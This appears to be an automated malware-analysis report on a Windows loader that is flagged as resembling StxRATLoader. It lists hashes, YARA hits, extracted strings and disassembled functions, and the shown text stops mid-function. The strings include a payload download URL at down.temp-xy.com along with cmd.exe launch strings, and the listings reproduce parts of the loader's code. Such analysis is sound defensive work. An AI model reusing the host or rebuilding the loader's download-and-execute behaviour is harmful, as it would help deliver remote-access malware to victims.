File Information hashes and primary classification
File name
9da5191c78e49b46e479cdfe20004a9d76ccc4a545deeb83e3c07f83db9cf736
File size
386.0 KiB
Architecture
X64
- MD5
- e89fee2f61dda1da1c9bd1541a71deb8
- SHA1
- c006b8020d7959f5f6ced76119c21f2da689fe9e
- SHA256
- 9da5191c78e49b46e479cdfe20004a9d76ccc4a545deeb83e3c07f83db9cf736
- TLSH
- T1f2848e03f595d5a8e446c034a71b9a13ca62bc8c0722b5ef3be858953f56ed16b3cf09
- Imphash
- 35a16eb32c3b55d6b94c1a0cd2b193bb
- Rich header
- -
Metadata parser-extracted fields
YARA Signatures 4 matching rules
Type.UNCOMMON
network
DownloadUsingWinHttp
lateral movement
RunShell
Type.INFO
compiler
MSVC_2015_linker
library
Zlib
Kesakode similarity verdict
StxRATLoader
0.4%
1 malware hits
0 library hits
227 clean hits
Anomalies signals worth reviewing
time:
DebugTimeDateStampInTheFuture
TimeDateStampInTheFuture
headers:
GuiSubsystemNoWindowApi
code:
HighXrefLoopingFunction
ManyHighValueImmediates
ManyUniqueImmediateBytes
SpaghettiFunction
XorInLoop
integrity:
NoChecksum
sections:
SectionNameUnknown
Constants identified constants and patterns
compress:
unlzx_table_three__32_lil_64
1
zinflate_distanceExtraBits__8_byt_30
1
zinflate_distanceStarts__16_lil_60
1
zinflate_lengthExtraBits__8_byt_29
1
zinflate_lengthStarts__16_lil_58
1
crypto:
PKCS_DigestDecoration_SHA256__8_byt_19
2
hash:
CRC_32_IEEE_802_3_poly_0x04C11DB7__32_lil_refl_True
1
oid:
organizationalUnitName
16
commonName
14
organizationName
14
countryName
11
sha256WithRSAEncryption
8
rsaEncryption
6
basicConstraints
5
keyUsage
5
sha-256
5
subjectKeyIdentifier
5
authorityInfoAccess
4
authorityKeyIdentifier
4
certificatePolicies
4
cRLDistributionPoints
4
extKeyUsage
4
ocsp
4
caIssuers
3
cps
3
localityName
3
stateOrProvinceName
3
codeSigning
2
contentType
2
messageDigest
2
sha1WithRSAEncryption
2
sha384WithRSAEncryption
2
signedData
2
spcIndirectDataContext
2
timeStamping
2
tSTInfo
2
anyPolicy
1
cmsAlgorithmProtection
1
individualCodeSigning
1
registry:
HKEY_LOCAL_MACHINE
1
Strings highest-value extracted strings
| Address | String | Refs | Encoding | Score |
|---|---|---|---|---|
| 0x1400559CA | cmd.exe | 1 | UTF16 | 223 |
| 0x140055708 | cmd.exe /d /e:ON /v:OFF /c " | 1 | ASCII | 208 |
| 0x140024BC4 | WinHttpReadData | 1 | ASCII | 202 |
| 0x140024FA8 | https://down.temp-xy.com/update/python3.zip | 1 | ASCII | 163 |
| 0x1400558C8 | error(zip): Failed to open zip file after multiple retries: - error: Failed to create directory '': error: Failed to... | 1 | ASCII | 159 |
| 0x140024FEC | /HTTP/1.1 | 1 | UTF16 | 158 |
| 0x140024FD4 | winhttp.dll | 1 | UTF16 | 154 |
| 0x140056EE4 | %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.\n | 1 | ASCII | 148 |
| 0x140055882 | \??\MountPointManager | 1 | UTF16 | 148 |
| 0x140024DE0 | maintaindown.py | 1 | ASCII | 148 |
| 0x140024F8A | CLICOLOR_FORCE | 1 | UTF16 | 146 |
| 0x1400250D0 | \msys-\cygwin--pty | 1 | UTF16 | 145 |
| 0x1400559A4 | \Device\NamedPipe\ | 1 | UTF16 | 145 |
| 0x140056E88 | Unknown pseudo relocation protocol version %d.\n | 1 | ASCII | 144 |
| 0x140024DD0 | tmp\python3.zip | 1 | ASCII | 143 |
| 0x140056F57 | VirtualQuery failed for %d bytes at address %p | 1 | ASCII | 142 |
| 0x1400558AE | \DosDevices\ | 1 | UTF16 | 141 |
| 0x140024B28 | svpy.exe | 1 | ASCII | 140 |
| 0x140055D3C | internal_server_error | 1 | ASCII | 139 |
| 0x140056F88 | VirtualProtect failed with code 0x%x | 1 | ASCII | 138 |
| 0x1400557F8 | \\.\pipe\zig-childprocess-- | 1 | ASCII | 138 |
| 0x140055510 | \Device\Null | 1 | UTF16 | 138 |
| 0x140024B99 | WinHttpReceiveResponse | 1 | ASCII | 138 |
| 0x140055575 | aborting due to recursive panic\n | 1 | ASCII | 137 |
| 0x140056EBA | Unknown pseudo relocation bit size %d.\n | 1 | ASCII | 136 |
| 0x140024F78 | NO_COLOR | 1 | UTF16 | 136 |
| 0x140024E71 | LOCALAPPDATA | 1 | ASCII | 134 |
| 0x1400593FC | api-ms-win-crt-environment-l1-1-0.dll | 1 | ASCII | 133 |
| 0x1400592F0 | api-ms-win-crt-filesystem-l1-1-0.dll | 1 | ASCII | 133 |
| 0x140056F37 | Address %p has no image-section | 1 | ASCII | 133 |
| 0x140024B73 | WinHttpOpenRequest | 1 | ASCII | 133 |
| 0x140055DDA | loop_detected | 1 | ASCII | 133 |
| 0x140024EAA | abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | 1 | ASCII | 132 |
| 0x14005581E | PATHEXT | 1 | UTF16 | 132 |
| 0x1400250F4 | getrandom() failed to provide entropy | 2 | ASCII | 131 |
| 0x140059334 | api-ms-win-crt-private-l1-1-0.dll | 1 | ASCII | 131 |
| 0x140059356 | api-ms-win-crt-runtime-l1-1-0.dll | 1 | ASCII | 131 |
| 0x140059398 | api-ms-win-crt-string-l1-1-0.dll | 1 | ASCII | 131 |
| 0x140056FAF | Mingw-w64 runtime failure:\n | 1 | ASCII | 131 |
| 0x140024B86 | WinHttpSendRequest | 1 | ASCII | 131 |
| 0x140024BD4 | WinHttpCloseHandle | 1 | ASCII | 131 |
| 0x140056E23 | _matherr(): %s in %s(%g, %g) (retval=%g)\n | 1 | ASCII | 130 |
| 0x140059378 | api-ms-win-crt-stdio-l1-1-0.dll | 1 | ASCII | 130 |
| 0x140055852 | error: thread panic: \ | 1 | ASCII | 130 |
| 0x140024BB0 | WinHttpQueryHeaders | 1 | ASCII | 130 |
| 0x140024B64 | WinHttpConnect | 1 | ASCII | 130 |
| 0x140056E15 | Unknown error | 1 | ASCII | 130 |
| 0x140023B0A | unknown error | 1 | ASCII | 130 |
| 0x1400593B9 | api-ms-win-crt-time-l1-1-0.dll | 1 | ASCII | 129 |
| 0x140059422 | api-ms-win-crt-math-l1-1-0.dll | 1 | ASCII | 129 |
| 0x140055AEE | multiple_choice | 1 | ASCII | 129 |
| 0x140059315 | api-ms-win-crt-heap-l1-1-0.dll | 1 | ASCII | 128 |
| 0x140055A32 | http.Status | 1 | ASCII | 128 |
| 0x140024B58 | WinHttpOpen | 1 | ASCII | 128 |
| 0x140024E8C | AppData/Local | 1 | ASCII | 127 |
| 0x140024E7E | XDG_DATA_HOME | 1 | ASCII | 127 |
| 0x140024C4A | Zig WinHTTP Client | 1 | ASCII | 126 |
| 0x1400237A0 | #+3;CScs | 0 | UTF16 | 126 |
| 0x140055596 | System | 1 | UTF16 | 126 |
| 0x140055848 | .EXE | 2 | UTF16 | 126 |
| 0x140024E65 | USERPROFILE | 1 | ASCII | 125 |
| 0x140055814 | PATH | 1 | UTF16 | 125 |
| 0x140056D28 | runtime error %d\n | 1 | ASCII | 124 |
| 0x1400593F2 | ntdll.dll | 1 | ASCII | 124 |
| 0x1400237F4 | !1Aa | 0 | UTF16 | 124 |
| 0x140055B5D | bad_request | 1 | ASCII | 122 |
| 0x140055A40 | continue | 1 | ASCII | 122 |
| 0x140055A22 | Volume{ | 1 | UTF16 | 121 |
| 0x1400555A8 | error. | 5 | ASCII | 121 |
| 0x140024620 | expand 32-byte k | 1 | ASCII | 120 |
| 0x140055568 | Invalid free | 1 | ASCII | 119 |
| 0x140024E9A | C:\Users\Public | 2 | ASCII | 117 |
| 0x140055AE6 | im_used | 1 | ASCII | 117 |
| 0x140024CA0 | https | 2 | ASCII | 116 |
| 0x140024E60 | HOME | 1 | ASCII | 116 |
| 0x1400593E5 | KERNEL32.dll | 1 | ASCII | 115 |
| 0x1400593D8 | ADVAPI32.dll | 1 | ASCII | 115 |
| - | Phttp://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0 | 0 | ASCII | 113 |
| - | Mhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S | 0 | ASCII | 112 |
| - | Mhttp://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0> | 0 | ASCII | 112 |
| 0x140055FD7 | CurrentWorkingDirectoryUnlinked | 1 | ASCII | 112 |
| 0x1400561AF | UnexpectedSecondSurrogateHalf | 1 | ASCII | 110 |
| 0x1400564B2 | Utf8CannotEncodeSurrogateHalf | 1 | ASCII | 109 |
| 0x1400564F5 | NoStandardHandleAttached | 1 | ASCII | 109 |
| 0x14005645D | GetModuleFileNameFailed | 1 | ASCII | 109 |
| 0x140056193 | ExpectedSecondSurrogateHalf | 1 | ASCII | 108 |
| 0x14005628D | FailedToCreateDirectory | 1 | ASCII | 108 |
| 0x14005614F | FailedToReceiveResponse | 1 | ASCII | 108 |
| 0x140056245 | AntivirusInterference | 1 | ASCII | 108 |
| 0x140056353 | SocketNotConnected | 1 | ASCII | 108 |
| 0x1400562F1 | ConnectionResetByPeer | 1 | ASCII | 107 |
| 0x140055FC5 | PasswordProtected | 1 | ASCII | 107 |
| 0x140055F8D | FileCreateFailed | 1 | ASCII | 107 |
| 0x14005605C | Utf8ExpectedContinuation | 1 | ASCII | 106 |
| 0x14005651A | UnrecoverableInvalidExe | 1 | ASCII | 106 |
| 0x140056028 | ProcessFdQuotaExceeded | 1 | ASCII | 106 |
| 0x14005643B | StderrStreamTooLong | 1 | ASCII | 106 |
| 0x1400236E5 | parameter error | 1 | ASCII | 106 |
| 0x140055698 | %t[%l]%s%L %m\n | 4 | ASCII | 106 |
| 0x140055EDE | InputOutput | 1 | ASCII | 106 |
| 0x1400556A7 | %H:%M:%S | 3 | ASCII | 106 |
| - | 5http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C | 0 | ASCII | 105 |
| 0x140056167 | FailedToGetStatusCode | 1 | ASCII | 105 |
| 0x14005617D | DanglingSurrogateHalf | 1 | ASCII | 105 |
| 0x1400560E2 | FailedToLoadFunction | 1 | ASCII | 105 |
| 0x140055EB4 | PermissionDenied | 1 | ASCII | 105 |
| 0x140056427 | StdoutStreamTooLong | 1 | ASCII | 104 |
| 0x14005632E | ConnectionTimedOut | 1 | ASCII | 104 |
| 0x140055F9E | FileOpenFailed | 1 | ASCII | 104 |
| 0x14005608A | Utf8EncodesSurrogateHalf | 1 | ASCII | 103 |
| 0x140056125 | FailedToCreateRequest | 1 | ASCII | 103 |
| 0x14005603F | SystemFdQuotaExceeded | 1 | ASCII | 103 |
| 0x140056390 | ResourceLimitReached | 1 | ASCII | 103 |
| 0x140055E94 | SetHandlerFailed | 1 | ASCII | 103 |
| 0x14005622B | SharingViolation | 1 | ASCII | 103 |
| 0x1400561E0 | FailedToReadData | 1 | ASCII | 103 |
| - | 2http://crl3.digicert.com/DigiCertTrustedRootG4.crl0 | 0 | ASCII | 102 |
| 0x140056541 | InvalidFormatString | 1 | ASCII | 102 |
| 0x1400560CE | FailedToLoadWinHttp | 1 | ASCII | 102 |
| 0x140056102 | FailedToInitialize | 1 | ASCII | 102 |
| 0x1400561CD | FailedToGetHeaders | 1 | ASCII | 102 |
| 0x1400563B3 | ProcessAlreadyExec | 1 | ASCII | 102 |
| 0x14005648E | AlreadyTerminated | 1 | ASCII | 102 |
| 0x1400562D1 | NotOpenForWriting | 1 | ASCII | 102 |
| 0x1400563E8 | InvalidHandle | 1 | ASCII | 102 |
| 0x1400236D7 | version error | 1 | ASCII | 102 |
| 0x140056002 | AccessDenied | 1 | ASCII | 102 |
| 0x14005572C | %%cd:~, | 1 | ASCII | 102 |
| 0x1400560A3 | Utf8CodepointTooLarge | 1 | ASCII | 101 |
| 0x14005626C | FileLocksNotSupported | 1 | ASCII | 101 |
| 0x14005636F | InvalidBatchScriptArg | 1 | ASCII | 101 |
| 0x1400563C6 | InvalidProcessGroupId | 1 | ASCII | 101 |
| 0x140055F5F | ZipCreateFailed | 1 | ASCII | 101 |
| 0x140056018 | NetworkNotFound | 1 | ASCII | 101 |
| 0x140055EEA | SystemResources | 1 | ASCII | 101 |
| 0x140055EA5 | DownloadFailed | 1 | ASCII | 101 |
| 0x140056410 | NetworkSubsystemFailed | 1 | ASCII | 100 |
| 0x140056075 | Utf8OverlongEncoding | 1 | ASCII | 100 |
| 0x1400560B9 | Utf8InvalidStartByte | 1 | ASCII | 100 |
| 0x14005613B | FailedToSendRequest | 1 | ASCII | 100 |
| 0x140055F1B | ReadOnlyFileSystem | 1 | ASCII | 100 |
| 0x1400564A0 | CodepointTooLarge | 1 | ASCII | 100 |
| 0x1400564D0 | TooManyParentDirs | 1 | ASCII | 100 |
| 0x1400562C0 | OperationAborted | 1 | ASCII | 100 |
| 0x140056532 | TruncatedInput | 1 | ASCII | 99 |
| 0x140056555 | BufferTooSmall | 1 | ASCII | 99 |
| 0x1400563F6 | WaitAbandoned | 1 | ASCII | 99 |
| 0x14005644F | CommandFailed | 1 | ASCII | 99 |
| 0x140055F51 | ZipOpenFailed | 1 | ASCII | 99 |
| 0x1400562E3 | LockViolation | 1 | ASCII | 99 |
| 0x140055F6F | ZipAddFailed | 1 | ASCII | 99 |
| 0x1400236A7 | stream error | 1 | ASCII | 99 |
| - | 'http://aia.entrust.net/ts1-chain256.cer01 | 0 | ASCII | 98 |
| 0x1400564E2 | UnrecognizedVolume | 1 | ASCII | 98 |
| 0x140056341 | NotOpenForReading | 1 | ASCII | 98 |
| 0x14005620D | LinkQuotaExceeded | 1 | ASCII | 98 |
| 0x1400561FB | PathAlreadyExists | 1 | ASCII | 98 |
| 0x140055F7C | ZipExtractFailed | 1 | ASCII | 98 |
| 0x140056307 | ProcessNotFound | 1 | ASCII | 98 |
| 0x14002368C | need dictionary | 1 | ASCII | 98 |
| 0x140056115 | FailedToConnect | 1 | ASCII | 98 |
| 0x140056404 | WaitTimeOut | 1 | ASCII | 97 |
| 0x140055EFA | BadPathName | 1 | ASCII | 97 |
| 0x140055ED2 | NameTooLong | 1 | ASCII | 97 |
| 0x140055F0F | SymLinkLoop | 1 | ASCII | 97 |
| 0x140055F46 | Unexpected | 1 | ASCII | 97 |
| 0x140056282 | WouldBlock | 1 | ASCII | 97 |
| 0x1400236B4 | data error | 1 | ASCII | 97 |
| 0x14002369C | file error | 1 | ASCII | 97 |
| 0x14005625B | FileTooBig | 1 | ASCII | 97 |
| 0x140056475 | HomeDirNotFound | 1 | ASCII | 96 |
| 0x1400236BF | out of memory | 1 | ASCII | 96 |
| 0x1400563A5 | InvalidUserId | 1 | ASCII | 96 |
| 0x140055EC5 | FileNotFound | 1 | ASCII | 96 |
| - | http://crl.entrust.net/ts1ca.crl0 | 0 | ASCII | 95 |
| - | https://www.entrust.net/rpa0\r | 0 | ASCII | 95 |
| - | !http://crl.entrust.net/2048ca.crl0 | 0 | ASCII | 94 |
| - | http://www.entrust.net/rpa03 | 0 | ASCII | 94 |
| 0x140056366 | Canceled | 1 | ASCII | 94 |
| 0x14005600F | NoDevice | 1 | ASCII | 94 |
| 0x140023040 | 1 | ASCII | 93 | |
| 0x1400231A0 | 1 | ASCII | 93 | |
| 0x1400562A5 | InvalidArgument | 1 | ASCII | 93 |
| 0x140056322 | DirNotEmpty | 1 | ASCII | 93 |
| 0x1400563DC | InvalidName | 1 | ASCII | 93 |
| 0x14005621F | NoSpaceLeft | 1 | ASCII | 93 |
| 0x140055E88 | OutOfMemory | 1 | ASCII | 93 |
| 0x140055FB9 | InvalidPath | 1 | ASCII | 93 |
| 0x140055FAD | MkDirFailed | 1 | ASCII | 93 |
| 0x140056317 | FileSystem | 1 | ASCII | 93 |
| 0x1400562B5 | BrokenPipe | 1 | ASCII | 93 |
| 0x140055FF7 | DeviceBusy | 1 | ASCII | 93 |
| 0x1400236CD | buf error | 1 | ASCII | 93 |
| - | http://ocsp.entrust.net02 | 0 | ASCII | 90 |
| - | http://ocsp.entrust.net03 | 0 | ASCII | 90 |
| 0x14005650E | InvalidArg0 | 1 | ASCII | 90 |
| 0x140055F3A | InvalidWtf8 | 1 | ASCII | 90 |
| 0x140055F2E | InvalidUtf8 | 1 | ASCII | 90 |
| 0x1400560F7 | InvalidURL | 1 | ASCII | 90 |
| 0x140056385 | InvalidExe | 1 | ASCII | 90 |
| 0x140023681 | stream end | 1 | ASCII | 90 |
| - | http://ocsp.digicert.com0\ | 0 | ASCII | 89 |
| - | http://ocsp.digicert.com0A | 0 | ASCII | 89 |
| 0x1400561F1 | DiskQuota | 1 | ASCII | 89 |
| 0x140056485 | Overflow | 1 | ASCII | 89 |
| 0x140055F06 | FileBusy | 1 | ASCII | 89 |
| 0x14005623C | PipeBusy | 1 | ASCII | 89 |
| 0x140056564 | Timeout | 1 | ASCII | 89 |
| - | http://www.digicert.com/CPS0 | 0 | ASCII | 88 |
| 0x140056055 | NotDir | 1 | ASCII | 88 |
| 0x140056266 | IsDir | 1 | ASCII | 88 |
| - | 8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10 | 0 | ASCII | 81 |
| - | 8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10 | 0 | ASCII | 81 |
| - | 8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1 | 0 | ASCII | 81 |
| 0x14002394D | decompression failed or archive is corrupted | 0 | ASCII | 80 |
| 0x1400559EF | : Unable to dump stack trace: debug info stripped\n | 0 | ASCII | 79 |
| - | 7www.entrust.net/CPS_2048 incorp. by ref. (limits liab.)1%0# | 0 | ASCII | 78 |
| - | 7www.entrust.net/CPS_2048 incorp. by ref. (limits liab.)1%0# | 0 | ASCII | 78 |
| - | 7www.entrust.net/CPS_2048 incorp. by ref. (limits liab.)1%0# | 0 | ASCII | 78 |
| 0x140055DF5 | network_authentication_required | 0 | ASCII | 78 |
| 0x140055CFE | request_header_fields_too_large | 0 | ASCII | 78 |
| 0x140058C7A | _set_invalid_parameter_handler | 0 | ASCII | 78 |
| 0x140058C2E | _initialize_narrow_environment | 0 | ASCII | 78 |
| 0x140024350 | \r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\r\... | 0 | ASCII | 77 |
| 0x140023908 | invalid header or archive is corrupted | 0 | ASCII | 77 |
| 0x1400238D5 | failed finding central directory | 0 | ASCII | 77 |
| 0x140055D1E | unavailable_for_legal_reasons | 0 | ASCII | 77 |
| - | \r290101000000Z0u1 | 0 | ASCII | 77 |
| 0x140056DDF | The result is too small to be represented (UNDERFLOW) | 0 | ASCII | 76 |
| 0x140055D92 | http_version_not_supported | 0 | ASCII | 76 |
| - | See www.entrust.net/legal-terms1907 | 0 | ASCII | 75 |
| - | See www.entrust.net/legal-terms1907 | 0 | ASCII | 75 |
| - | See www.entrust.net/legal-terms1907 | 0 | ASCII | 75 |
| - | See www.entrust.net/legal-terms1907 | 0 | ASCII | 75 |
| 0x1400239BE | unsupported central directory size | 0 | ASCII | 75 |
| - | \r230113000000Z | 0 | ASCII | 75 |
| - | *Entrust.net Certification Authority (2048)0 | 0 | ASCII | 74 |
| - | *Entrust.net Certification Authority (2048)0 | 0 | ASCII | 74 |
| - | *Entrust.net Certification Authority (2048)0 | 0 | ASCII | 74 |
| 0x140055DAD | variant_also_negotiates | 0 | ASCII | 74 |
| 0x140059220 | NtQueryVolumeInformationFile | 0 | ASCII | 73 |
| 0x140058EB6 | GetConsoleScreenBufferInfo | 0 | ASCII | 73 |
| 0x140058F76 | InitializeCriticalSection | 0 | ASCII | 73 |
| 0x140058CE6 | __stdio_common_vfprintf | 0 | ASCII | 73 |
| 0x140055A88 | non_authoritative_info | 0 | ASCII | 73 |
| - | 20231102033749Z0 | 0 | ASCII | 73 |
| - | \r210429000000Z | 0 | ASCII | 73 |
| 0x14005816F | ?cUUUUU | 0 | ASCII | 73 |
| 0x140057887 | ?IUUUUU | 0 | ASCII | 73 |
| 0x14005787F | ?IUUUUU | 0 | ASCII | 73 |
| - | 0(c) 2015 Entrust, Inc. - for authorized use only1&0$ | 0 | ASCII | 72 |
| - | 0(c) 2015 Entrust, Inc. - for authorized use only1&0$ | 0 | ASCII | 72 |
| - | 0(c) 2015 Entrust, Inc. - for authorized use only1&0$ | 0 | ASCII | 72 |
| - | 0(c) 2015 Entrust, Inc. - for authorized use only1&0$ | 0 | ASCII | 72 |
| 0x140056D97 | Partial loss of significance (PLOSS) | 0 | ASCII | 72 |
| 0x140059076 | SetUnhandledExceptionFilter | 0 | ASCII | 72 |
Functions high-value functions
Function listings
0x140020977 sub_140020977 str 0 api 0 imm 23 Malware
sub_140020977() {
push rbp
mov rbp, rsp
mov rdx, 0x1FF5C2923A788D2C
xor rdx, rcx
mov rax, rcx
rol rax, 0x20
mov rcx, 0xE7037ED1A0B428DB
xor rax, rcx
mul rdx
mov r8, 0xA0761D6478BD6427
xor r8, rax
xor rcx, rdx
mov rax, rcx
mul r8
xor rax, rdx
pop rbp
ret
}
/* DISPLAY WARNING: Type casts are NOT being printed */
uint64_t sub_140020977(uint64_t param_1)
{
undefined auVar1 [16];
undefined auVar2 [16];
undefined auVar3 [16];
undefined auVar4 [16];
auVar1._8_8_ = 0;
auVar1._0_8_ = (param_1 << 0x20 | param_1 >> 0x20) ^ 0xe7037ed1a0b428db;
auVar3._8_8_ = 0;
auVar3._0_8_ = param_1 ^ 0x1ff5c2923a788d2c;
auVar1 = auVar1 * auVar3 ^ 0xe7777ff5f8bd6cff;
auVar2._8_8_ = 0;
auVar2._0_8_ = auVar1._8_8_;
auVar4._8_8_ = 0;
auVar4._0_8_ = auVar1._0_8_;
return SUB168(auVar2 * auVar4, 0) ^ SUB168(auVar2 * auVar4, 8);
}
0x140010791 sub_140010791 str 53 api 0 imm 47 Unknown
sub_140010791() {
push rbp
push r15
push r14
push r13
push r12
push rsi
push rdi
push rbx
mov eax, 0x20488
call sub_140021d41()
sub rsp, rax
lea rbp, [rsp+0x80]
movaps [rbp+0x203F0], xmm6
mov r14, rdx
mov [rbp+0x20380], rcx
movups xmm0, [rdx]
movaps [rbp+0x202C0], xmm0
movups xmm0, [rdx]
movaps [rbp+0x20310], xmm0
movups xmm0, [rdx]
movaps [rbp+0x20280], xmm0
lea rsi, [rbp-0x48]
mov rcx, rsi
call sub_140013636()
cmp word ptr [rsi+0x20], 0x00
mov [rbp+0x203C0], r14
jnz .30
movups xmm0, [rbp-0x48]
movdqu xmm1, [rbp-0x38]
lea rcx, [rbp+0x20120]
movdqa [rcx+0x10], xmm1
movaps [rcx], xmm0
lea rdx, ["LOCALAPPDATA"]
push 0x0C
pop r8
call sub_1400155c5()
test rax, rax
jz .1
mov r9, rdx
lea rsi, [rbp+0x20200]
jmp .2
.1:
lea rdx, ["XDG_DATA_HOME"]
lea rcx, [rbp+0x20120]
push 0x0D
pop r8
call sub_1400155c5()
test rax, rax
jz .13
mov r9, rdx
lea rsi, [rbp+0x20158]
.2:
lea rdx, [rbp+0x20280]
mov rcx, rsi
mov r8, rax
call sub_14000e323()
lea rcx, [rbp+0x20120]
call sub_140013cbc()
cmp word ptr [rsi+0x10], 0x00
lea rax, ["C:\\Users\\Public"]
cmovz rax, [rsi]
mov [rbp+0x20378], rax
push 0x0F
pop r13
cmovz r13, [rsi+0x08]
.3:
lea rcx, [0x140024EF0]
call sub_1400151ce()
lea rdi, [rbp+0xFFC0]
mov rcx, rdi
mov rdx, rax
call sub_140015563()
xor r12d, r12d
lea rbx, [rbp-0x48]
push 0x08
pop r14
push 0x3E
pop rsi
lea r15, ["abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"]
.4:
cmp r12, 0x0A
jz .7
mov rcx, rdi
mov rdx, rbx
mov r8, r14
call sub_14001bb34()
mov rax, rsi
mul [rbp-0x48]
cmp rax, 0x3D
jnbe .6
.5:
cmp rax, 0x0F
jnbe .6
mov rcx, rdi
mov rdx, rbx
mov r8, r14
call sub_14001bb34()
mov rax, rsi
mul [rbp-0x48]
jmp .5
.6:
mov al, [rdx+r15*1]
mov [rbp+r12*1+0x20300], al
inc r12
jmp .4
.7:
mov rax, [rbp+0x20300]
lea rcx, [rbp+0x203B0]
mov [rcx], rax
movzx eax, word ptr [rbp+0x20308]
mov [rcx+0x08], ax
lea r14, [rbp+0x20340]
mov r12, [rbp+0x20378]
mov [r14], r12
mov [r14+0x08], r13
mov [r14+0x10], rcx
mov qword ptr [r14+0x18], 0x0A
lea rsi, [rbp+0x20220]
mov rcx, rsi
mov r15, [rbp+0x203C0]
mov rdx, r15
mov r8, r14
call sub_14000e390()
movzx esi, word ptr [rsi+0x10]
test si, si
jnz .93
mov rbx, [rbp+0x20220]
mov rdi, [rbp+0x20228]
call sub_1400172a6()
lea rcx, [rbp+0x20310]
mov rdx, r12
mov r8, r13
call sub_14000e53c()
lea rsi, [rbp+0x20068]
mov rcx, rsi
mov rdx, r15
mov r8, rbx
mov r9, rdi
call sub_14000e56c()
movsx rsi, word ptr [rsi+0x10]
test rsi, rsi
jz .11
call sub_1400156a9()
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x30]
lea r14, [rbp+0x200E0]
mov [r14], rax
lea rcx, [rbp-0x48]
mov [rcx], r14
lea r15, [sub_140015725()]
mov [rcx+0x08], r15
lea rdx, [0x140025130]
push 0x1A
pop r8
call sub_140017f82()
test ax, ax
jnz .8
lea rcx, [rbp+0xFFC0]
mov [rcx], r14
mov [rcx+0x08], r15
lea rdx, ["error."]
push 0x06
pop r8
call sub_140017f82()
test ax, ax
jnz .8
shl rsi, 0x04
lea rax, [0x140056570]
mov rdx, [rsi+rax*1]
mov r8, [rsi+rax*1+0x08]
lea rcx, [rbp+0xFFC0]
call sub_140017f82()
test ax, ax
jnz .8
lea rdx, [0x14002514A]
lea rcx, [rbp-0x48]
push 0x01
pop r8
call sub_140017f82()
.8:
call sub_140015751()
lea rcx, [rbp+0x202C0]
.9:
mov rdx, rbx
mov r8, rdi
call sub_14000e53c()
movups xmm0, [0x140024DB8]
mov rax, [rbp+0x20380]
movups [rax], xmm0
mov qword ptr [rax+0x10], 0x03
.10:
movaps xmm6, [rbp+0x203F0]
add rsp, 0x20488
pop rbx
pop rdi
pop rsi
pop r12
pop r13
pop r14
pop r15
pop rbp
ret
.11:
mov r13, [rbp+0x20068]
mov r12, [rbp+0x20070]
mov rax, gs:[0x30]
mov rax, [rax+0x60]
mov rax, [rax+0x20]
mov rax, [rax+0x48]
lea rcx, [rbp+0x20060]
mov [rcx], rax
mov rdx, r13
mov r8, r12
call sub_1400134f2()
mov esi, eax
call sub_1400172a6()
test si, si
; listing truncated
/* DISPLAY WARNING: Type casts are NOT being printed */
undefined4 * sub_140010791(undefined8 param_1,undefined4 *param_2)
{
uint32_t *puVar1;
undefined *puVar2;
undefined2 uVar3;
uint32_t uVar4;
undefined8 uVar5;
undefined auVar6 [16];
undefined auVar7 [16];
undefined auVar8 [16];
int16_t iVar9;
int16_t iVar10;
int16_t iVar11;
int16_t iVar12;
int16_t iVar13;
int16_t iVar14;
undefined auVar15 [16];
uint8_t uVar16;
int16_t iVar17;
int16_t iVar18;
int64_t iVar19;
int64_t iVar20;
int64_t iVar21;
int64_t *piVar22;
code *pcVar23;
undefined *puVar24;
undefined4 *puVar25;
int64_t *piVar26;
uint64_t uVar27;
undefined8 uVar28;
int64_t iVar29;
undefined (*pauVar30) [16];
uint16_t uVar31;
undefined8 *puVar32;
uint64_t uVar33;
int64_t *piVar34;
int64_t **ppiVar35;
undefined8 uVar36;
undefined8 uVar37;
uint64_t uVar38;
undefined8 *puVar39;
undefined8 uVar40;
int64_t *piVar41;
char cVar42;
int16_t *piVar43;
int64_t unaff_GS_OFFSET;
bool bVar44;
undefined4 uVar45;
undefined4 uVar46;
undefined4 uVar47;
undefined4 uVar48;
undefined auVar49 [16];
undefined auVar50 [16];
undefined4 unaff_XMM6_Da;
undefined4 unaff_XMM6_Db;
undefined4 unaff_XMM6_Dc;
undefined4 unaff_XMM6_Dd;
undefined8 uStackX_8;
undefined8 uStackX_10;
undefined8 auStackX_18 [2];
uint64_t uStack_48;
uStack_48 = 0x1400107a7;
iVar19 = sub_140021d41();
iVar19 = -iVar19;
auVar15._4_4_ = unaff_XMM6_Db;
auVar15._0_4_ = unaff_XMM6_Da;
auVar15._8_4_ = unaff_XMM6_Dc;
auVar15._12_4_ = unaff_XMM6_Dd;
*(&stack0x00020430 + iVar19) = auVar15;
*(&stack0x000203c0 + iVar19) = param_1;
uVar45 = param_2[1];
uVar46 = param_2[2];
uVar47 = param_2[3];
*(&stack0x00020300 + iVar19) = *param_2;
*(&stack0x00020304 + iVar19) = uVar45;
*(&stack0x00020308 + iVar19) = uVar46;
*(&stack0x0002030c + iVar19) = uVar47;
uVar45 = param_2[1];
uVar46 = param_2[2];
uVar47 = param_2[3];
*(&stack0x00020350 + iVar19) = *param_2;
*(&stack0x00020354 + iVar19) = uVar45;
*(&stack0x00020358 + iVar19) = uVar46;
*(&stack0x0002035c + iVar19) = uVar47;
uVar45 = param_2[1];
uVar46 = param_2[2];
uVar47 = param_2[3];
*(&stack0x000202c0 + iVar19) = *param_2;
*(&stack0x000202c4 + iVar19) = uVar45;
*(&stack0x000202c8 + iVar19) = uVar46;
*(&stack0x000202cc + iVar19) = uVar47;
*(&uStack_48 + iVar19) = 0x1400107ed;
sub_140013636(&stack0xfffffffffffffff8 + iVar19);
*(&stack0x00020400 + iVar19) = param_2;
